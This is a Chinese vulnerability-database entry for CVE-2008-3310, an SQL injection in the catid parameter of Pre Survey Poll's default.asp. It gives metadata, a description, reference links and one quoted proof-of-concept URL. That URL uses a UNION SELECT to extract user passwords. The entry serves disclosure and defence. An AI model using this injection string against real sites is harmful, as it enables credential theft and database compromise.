Pre Survey Poll 'default.asp'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115742 漏洞类型 SQL注入
发布时间 2008-07-22 更新时间 2008-07-25
CVE编号 CVE-2008-3310 CNNVD-ID CNNVD-200807-400
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/32111
https://www.securityfocus.com/bid/80967
https://cxsecurity.com/issue/WLB-2008070134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-400
|漏洞详情
PreSurveyPoll是一款票选调查软件。PreSurveyPoll中的default.asp存在SQL注入漏洞。远程攻击者可以借助catid参数,执行任意的SQL指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/30349/info

Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users
|受影响的产品
Preproject Pre Survey Poll 0
|参考资料

来源:XF
名称:presurveypoll-default-sql-injection(43956)
链接:http://xforce.iss.net/xforce/xfdb/43956
来源:MILW0RM
名称:6119
链接:http://www.milw0rm.com/exploits/6119
来源:SREASON
名称:4039
链接:http://securityreason.com/securityalert/4039
来源:SECUNIA
名称:31187
链接:http://secunia.com/advisories/31187